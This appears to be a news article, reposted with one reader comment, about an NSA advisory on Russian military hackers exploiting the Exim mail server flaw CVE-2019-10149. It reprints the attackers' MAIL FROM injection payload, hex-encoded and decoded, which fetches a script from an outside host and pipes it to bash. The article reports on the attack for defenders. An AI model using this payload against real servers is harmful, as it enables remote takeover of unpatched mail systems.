The NSA has raised the alarm over what it says is Russia's active exploitation of a remote-code execution flaw in Exim for which a patch exists.
The American surveillance super-agency said [PDF] on Thursday the Kremlin's military intelligence hackers are actively targeting some systems vulnerable to CVE-2019-10149, a security hole in the widely used Exim mail transfer agent (MTA) that was fixed last June.
Here's a sample of Moscow's exploit code, according to the NSA, which is sent to a vulnerable server to hijack it – we've censored parts of it to avoid tripping any filters:
MAIL FROM:${run{\x2Fbin\x2Fsh\t- c\t\x22exec\x20\x2Fusr\x2Fbin\x2Fwget\x20\x2DO\x20\x2D\x20hxxp\:\x2F\x2F\hostapp.be\x2Fscript1.sh\x20\x7C\x20bash\x22}}@hostapp.be That hexadecimal decodes to: /bin/sh -c "exec /usr/bin/wget -O - hxxp://hostapp.be/script1.sh | bash"
"The Russian actors, part of the General Staff Main Intelligence Directorate's (GRU) Main Center for Special Technologies (GTsST), have used this exploit to add privileged users, disable network security settings, execute additional scripts for further network exploitation; pretty much any attacker's dream access – as long as that network is using an unpatched version of Exim MTA," the NSA said.
In this case, miscreants, linked to the military-backed Sandworm operation, exploit improper validation of the recipient's address in Exim's deliver_message() function in /src/deliver.c to inject and execute a shell command, which downloads and runs another script to commandeer the server. An in-depth technical description of the programming blunder can be found here by Qualys, which found and reported the flaw last year.
Because Exim is widely used on millions of Linux and Unix servers for mail, bugs in the MTA are by nature public-facing and pose an attractive target for hackers of all nations.
The NSA did not say who exactly was being targeted, though we can imagine the Russian military takes an interest in probing foreign government agencies and vital industries. GRU hackers have also previously targeted energy utilities, by some reports.
Previously: 400,000 Servers Using Exim May be at Risk of Serious Code-Execution Attacks
(Score: 3, Informative) by Pav on Saturday May 30 2020, @10:39PM
Perhaps Russian hackers attached to the kremlin DID do this... but because this story seems to mesh with a certain narrative, and because of that context I thought I'd mention significant LEFT critiques of Russiagate posted recently - this issue is not strictly divided along partisan lines as many would like us to believe.
Glenn Greenwald from The Intercept, a journalist who broke the Snowden story and who has enough of a legal background to have insight into issues of law comments on the Flynn case an the wider Russiagate context [youtube.com].
Aaron Mate and Matt Taibbi [youtube.com], both winners of the I.F "Izzy" Stone independent journalism award, published at The Hill, The Nation and many other left publications also discuss the Flynn case and Russiagate.